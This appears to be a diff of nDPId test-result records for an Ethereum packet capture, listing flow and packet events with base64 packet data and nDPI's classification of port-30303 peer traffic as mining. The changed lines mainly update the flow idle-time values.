+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364523,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGH3XAqAG4BQFT4t0xdl\/cLTE7AAAAALAC\/\/8DmAAAAgQFtAEDAwUBAQgKItiUTwAAAAAEAgAA"} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364523,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364523,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.128.195.220","src_port":56626,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364523,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGAfvAqAG4soDD3N0ydl\/wysJIAAAAALAC\/\/9AcgAAAgQFtAEDAwUBAQgKItiUTwAAAAAEAgAA"} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364523,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364523,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.255.23.113","src_port":56627,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364523,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGPejAqAG4Iv8Xcd0zdl8e+UQoAAAAALAC\/\/\/MUAAAAgQFtAEDAwUBAQgKItiUTwAAAAAEAgAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364523,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364523,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":56628,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364523,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGRzjAqAG4A9EtT900dl+bF1VlAAAAALAC\/\/9IRAAAAgQFtAEDAwUBAQgKItiUTwAAAAAEAgAA"} 00639{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1578508364563,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1578508364563,"pkt":"KDc3AG3IEBMx8Tl2CABFAACxV7ZAADERmgVCKlL2wKgBuHZfdl8AnaK0fEIbGBqDvIrgEkHISxvw4daIo1RSAPsaWiRQZnDOwteCpdNuEHAKkf4qhTn951kjq+ta18NQVXgW\/g4PPXuXiV0Qa\/G9UyK1NNATBLMnTaWqYuSaSklfuyWrYJCN+duPAALyy4RPFs69gun3gun3oGE9eACysJzHYDAgc39fUYaAxGcHwJ0T9TM+bdQkH1h\/hF4WIIg="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1578508364565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364565,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC0GcyYjnvSXwKgBuHZf3ScG6rxyhP4uMKAScSBDbwAAAgQFrAQCCAo03AK8ItiUTwEDAwc="} 
-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1578508364565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364565,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGYC7AqAG4I570l90ndl+E\/i4wBuq8c4AQECzS\/AAAAQEICiLYlHo03AK8"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1578508364566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364566,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDf+ygMPcwKgBuHZf3TL4VGlQ8MrCSaAScSATXAAAAgQFrAQCCApfPQwNItiUTwEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1578508364566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364566,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAgfAqAG4soDD3N0ydl\/wysJJ+FRpUYAQECyi6QAAAQEICiLYlHpfPQwN"} 
-00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":495,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1578508364568,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.158.244.151","src_port":56615,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":546,"flow_tot_l4_payload_len":546,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1578508364568,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.128.195.220","src_port":56626,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1578508364569,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364569,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGyBNZJmMiwKgBuHZf3TAEAfQVmn8HEKAScSAQTQAAAgQFrAQCCApfmkPpItiUTwEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1578508364569,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364569,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGvBvAqAG4WSZjIt0wdl+afwcQBAH0FoAQECyf1wAAAQEICiLYlH1fmkPp"} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364571,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":473,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508364571,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"89.38.99.34","src_port":56624,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1578508364593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364593,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACcGVuwi\/xdxwKgBuHZf3TMrXBsGHvlEKaAScSD3ewAAAgQFrAQCCAqnEIc7ItiUTwEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1578508364593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364593,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGPfTAqAG4Iv8Xcd0zdl8e+UQpK1wbB4AQECyG7wAAAQEICiLYlJSnEIc7"} -00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364595,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.255.23.113","src_port":56627,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1578508364565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364565,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC0GcyYjnvSXwKgBuHZf3ScG6rxyhP4uMKAScSBDbwAAAgQFrAQCCAo03AK8ItiUTwEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1578508364565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364565,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGYC7AqAG4I570l90ndl+E\/i4wBuq8c4AQECzS\/AAAAQEICiLYlHo03AK8"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1578508364566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364566,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDf+ygMPcwKgBuHZf3TL4VGlQ8MrCSaAScSATXAAAAgQFrAQCCApfPQwNItiUTwEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1578508364566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364566,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAgfAqAG4soDD3N0ydl\/wysJJ+FRpUYAQECyi6QAAAQEICiLYlHpfPQwN"} 
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364568,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":495,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1578508364568,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.158.244.151","src_port":56615,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364568,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":546,"flow_tot_l4_payload_len":546,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1578508364568,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.128.195.220","src_port":56626,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1578508364569,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364569,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGyBNZJmMiwKgBuHZf3TAEAfQVmn8HEKAScSAQTQAAAgQFrAQCCApfmkPpItiUTwEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1578508364569,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364569,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGvBvAqAG4WSZjIt0wdl+afwcQBAH0FoAQECyf1wAAAQEICiLYlH1fmkPp"} +00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364571,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":473,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508364571,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"89.38.99.34","src_port":56624,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1578508364593,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364593,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACcGVuwi\/xdxwKgBuHZf3TMrXBsGHvlEKaAScSD3ewAAAgQFrAQCCAqnEIc7ItiUTwEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1578508364593,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364593,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGPfTAqAG4Iv8Xcd0zdl8e+UQpK1wbB4AQECyG7wAAAQEICiLYlJSnEIc7"} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364595,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.255.23.113","src_port":56627,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
01870{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1578508364631,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1099,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1099,"pkt_l4_len":1065,"thread_ts_msec":1578508364631,"pkt":"KDc3AG3IEBMx8Tl2CABFAAQ9McxAACoRfjA056VswKgBuHZfdl8EKSMV0Tk6zLZQqYdPasDvQYAfjhJ8qeDK0iQF1oC6v4BIFO8Ukv4XviQf8O74kSNp590utu+\/aRkEwwpxoabIrzvIzmTnyJlNpeyfgvNPwLIyg8I+w4LWPa4MA\/W2\/Jap8zB7AAT5A7z5A7T4TYQS26efgnZfgnZfuEAwkgYgUPIi4WiJg+QLzg9wGMhxPAR7azw\/xSKBAPOQbQlR3L69+mdeoxh\/qQi76RfNXeauKXl5ICJHofVK35cH+E2EUt2AH4J2YIJ2YLhAIbpA\/cDFhpXtS\/hixQb3nA9r93xmFVARyWt8mvD62Q42RXQv9d4buwnSPqvoZ8VPM1tV452Mu7b1nW6WCZP3H\/hNhJBbeIeCdl+Cdl+4QHDcQogYDcUZvsmo9wM3ftVwQss5t6Xz7SYpcIe0QCLsJRPOe\/7IMshT7rIUH59Wvzm2VWBMciyHxs11tRtvlg74TYSyPgragnZfgnZfuECktuxNZlsAPCNrxc8drmg5UZJYYlgJcgwixi3dHcHaL+SmxYYPit8ZDD0AQGDBI97zkdb5Vg5h5AMJ3ltOege3+E2Esj4dt4J2X4J2X7hAbSf3keqm\/kX1w8mhO8tfUrHPkpEON98Bfi90NSvh60PrPxJjJwxphJtd9yYNAp6bvKKmXex+Pf1jNZwIZzl1LfhNhA3mbCqCdl+Cdl+4QOL5cPG1naCZem66zt1KAC6uDCfFoxJhecyNkCxirh\/KFEuDlQVcZ87QmYypugLnAbyvaDrG2A\/fgNNcBVjcu7P4TYS524U+gnZfgnZfuEAvzWrhvDjoXJOa\/ZdCbLgHiFuGktYvbPu1Kx0QfSszMjCe5P4b3hECkMlBLQo90CRjw1UcL0V+qQHcUkhH7ixE+E2ErGlePoJ2X4J2X7hAXGqY3uhYXKqMbPC9rcGcCUaWh+Dhi0uXFAXOGFtMr99hmG7UDnrqzTA\/o5MeRw5C1b8eG9l8GAevaeYZyFb6JfhNhLaioT2Cdl+Cdl+4QIU96ApVNnmCgofL7UIVwC0ussPQFE9BZpIkW9NYXxtm+4r+lcBEpjNfLr4w84vJM4LIgefP7wW0fAmtWWHpBj34TYRZo5RJgnklgnkluED1tj7tRebZlvZCTgHMIT8H0RpJXJ6gH+sJFUxXqZs38C\/hpzENTsCSDh1o2HUHvKg2FabU7+4S+HyXXU68T+Xi+E2EM01tNoLk1oLk1rhAfag2FjkUzZm46\/aJuVMW3oNNsPORtJDs86feqI9xjoUJ09giSja9nrnxBmA4a19j\/wmY0SxfQ5ijGeyrdMEjJvhNhCPk+oyCdl+Cdl+4QD9WPrST\/PNOA12+8bgX6kV4hJFBTbV9EgAQ6hcCTUo0f0CQNtNTkrUkC7hmmUaZ\/d9jh6CLjUr6pActojR+FlyEXhYgYA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364632,"flow_last_seen":1578508364632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364632,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.60.79","src_port":56629,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1578508364632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364632,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGCOPAqAG4MyY8T901dl\/qiNMXAAAAALAC\/\/88YQAAAgQFtAEDAwUBAQgKItiUuAAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1578508364646,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364646,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGQxWi86BTwKgBuHZf3SW77REO6nqus6AScSAW9gAAAgQFrAQCCAp1Z9P7ItiUTwEDAwc="} 
-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1578508364646,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364646,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGNR3AqAG4ovOgU90ldl\/qeq6zu+0RD4AQECymNwAAAQEICiLYlMZ1Z9P7"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364647,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":458,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1578508364647,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.243.160.83","src_port":56613,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364632,"flow_last_seen":1578508364632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364632,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.60.79","src_port":56629,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1578508364632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364632,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGCOPAqAG4MyY8T901dl\/qiNMXAAAAALAC\/\/88YQAAAgQFtAEDAwUBAQgKItiUuAAAAAAEAgAA"} 